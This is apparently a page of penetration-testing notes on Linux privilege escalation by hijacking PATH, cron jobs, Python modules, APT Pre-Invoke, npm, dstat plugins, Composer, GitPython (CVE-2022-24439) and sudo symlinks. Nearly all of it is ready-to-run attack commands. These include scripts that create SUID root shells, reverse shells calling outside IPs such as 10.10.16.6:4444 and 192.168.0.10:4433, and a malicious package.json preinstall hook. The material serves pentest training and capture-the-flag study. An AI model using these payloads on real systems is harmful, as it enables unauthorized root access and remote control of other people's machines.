Hijacks

`PATH` Hijacking

When a script is executed with elevated privileges (e.g., via sudo or in a cron job) and calls other binaries or scripts with relative paths, it may be possible to hijack the execution flow by manipulating the PATH variable or exploiting relative paths.

Check $PATH

echo $PATH

`PATH` Hijacking with `sudo` :

Lists allowed commands

sudo -l

Sometimes is possible to run scripts as sudo that call others scripts within the script.
When this scripts are called by a relative path is possible to create a malicious script on a directory with write permissions.
This commands creates a script named initdb.sh that will copy bash to a file in the /tmp folder, when called for execution:

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/shellie\nchown root:root /tmp/shellie\nchmod 6777 /tmp/shellie' | tee initdb.sh

Once the malicious script is executed by the vulnerable script, you just need to execute the shell from the /tmp folder to become root:

/tmp/shellie -p

Path Hijacking in `cron` job:

When PATH includes /usr/local/bin before /usr/bin in the cron job's environment.
There is an opportunity for PATH hijacking if a binary or script is executed without using an absolute path.
By placing a malicious binary in a directory earlier in the PATH (e.g., /usr/local/bin), you can hijack the execution flow.

echo -e '#!/bin/bash\n\ncp /bin/bash /bin/shellie\nchmod u+s /bin/shellie' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts

bash drops SUID privileges by default, so make sure to run it with -p to keep root:

shellie -p

Path Hijack in `supervisord.pid` :

Supervisor it’s a process management tool for keeping services running.
Each managed process must have a [program:<name>] line followed by another line command= where you should place the payload:

echo -e "[program:memcached]\ncommand = bash -c 'bash -i  >& /dev/tcp/10.10.16.6/4444 0>&1'" > memcached.ini

`Python` Path Hijacking

Sometimes python scripts are being executed by cron jobs or by other scripts with sudo permissions:

Look for writable modules

find /usr/lib/python* -type f -writable -ls 2>&1 | grep python

Look in virtual environments

find /path/to/venv -type f -writable -ls 2>&1 | grep python

Look in the entire system

find -type f -writable -ls 2>&1 | grep python

Check the python PATH order:

python -c 'import sys; print "\n".join(sys.path)'

Here is a example of a reverse shell to hijack the os module:

echo 'import pty
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.6",4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()' >> os.py

When a module is imported you can create a malicious module on the same directory where the vulnerable script is and python will import the malicious module instead:

import pty

pty.spawn("/bin/bash")

`sudo` via `PHP Cronjob`

Use this reverse shell to hijack PHP files being used with sudo privileges by a cron job or another script:

$sock=fsockopen("10.10.16.8", 4445);
exec("/bin/sh -i <&3 >&3 2>&3");

`sudo` via `Symlink`

ln -s /root/root.txt t.trace.db

Path Hijacking via `doas`

doas is a lightweight, simple command-line utility for running commands with elevated privileges on Unix-like systems, similar to sudo.
doas.conf have important information for privilege escalation:

find / -name "doas.conf" 2>/dev/null

Path Hijacking via `sudo -i`

If there is a writable directory in the $PATH (e.g., /tmp or /home/user/), and an attacker can control the contents of this directory.
First, create a malicious bash script in /tmp/bash:

cp /bin/bash .

Then on the vulnerable $PATH just run:

sudo -i

`sudo` via `PHP`

If is possible to user PHP with sudo:

sudo /usr/bin/php -r 'system("/bin/sh");'

Hijack `APT`

`Pre-Invoke`

Create a malicious config file to be invoked before APT runs:

echo 'APT::Update::Pre-Invoke {"bash -c '\''bash -i >& /dev/tcp/192.168.0.10/4433 0>&1'\''"}' > file_name

APT check this directory for pre-invoke scripts:

/etc/apt/apt.conf.d

Just wait for listener.

`npm` via `sudo`

A NodeJS package is defined in a file package.json, is possible to create a malicious package and run it with the --unsafe option to get code execution:

{
  "name": "root_please",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "/bin/bash"
  }
}

The malicious package.json needs to be contain within the fake package directory; once is all setup just run it with sudo:

sudo npm i package/ --unsafe

`dstat` Plugin poisoning

Allows to run arbitrary python scripts loaded as “external plugins” if they are located in one of the directories stated in the man page:

~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat

Normally to escalate privilege you want to choose the ones within the root path, check for writable permissions:

ls -ld /usr/local/share/dstat/
ls -ld /usr/share/dstat/

Create a malicious plugin:

echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_tokyo.py
echo 'import os; os.execv("/bin/sh", ["sh"])' > ~/.dstat/dstat_tokyo.py

Execute it with --PluginName:

doas /usr/bin/dstat --tokyo
sudo dstat --tokyo

`Composer` Hijacking

First create the temporal folder where you will invoke the shell from and save in an environmental variable:

TF=$(mktemp -d)

Once is done, create the malicious script to feed composer:

echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json

Finally, just execute the script with it's in-build option:

sudo composer --working-dir=$TF run-script x

`GitPython`

CVE-2022-24439

Inadequate validation of user input when handling remote URLs passed to the clone command:

Create the reverse shell

echo "bash -i >& /dev/tcp/10.10.16.10/4444 0>&1" > /tmp/shell.sh

Payload

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell.sh'

`Symbolic Links` via `sudo`

`Sudoedit Double Wildcard Exploit`

Using this exploit is possible to create a symbolic link pointing to the authorized_keys file.
First create a new directory in the vulnerable path:

 mkdir tokyo

Now, from the new directory pop the symbolic link:

 ln -s /home/alekos/.ssh/authorized_keys layout.html

Finally use sudoedit to write your public key:

sudoedit -u alekos /var/www/testing/tokyo/layout.html

`tar wildcards`

Move the directory being use by the script:

mv development{,.orig}

Replace it with a symbolic link pointing to your target directory:

ln -s /root development

Decompress the content:

tar xvf file.tar.gz -C /tmp/

PreviousLinux Privilege Escalation NextJailbreaks

Last updated 1 month ago

PATH Hijacking

PATH Hijacking with sudo :

Path Hijacking in cron job:

Path Hijack in supervisord.pid :

Python Path Hijacking

sudo via PHP Cronjob

sudo via Symlink

Path Hijacking via doas

Path Hijacking via sudo -i

sudo via PHP

Hijack APT

Pre-Invoke

npm via sudo

dstat Plugin poisoning

Composer Hijacking

GitPython

Symbolic Links via sudo

Sudoedit Double Wildcard Exploit

tar wildcards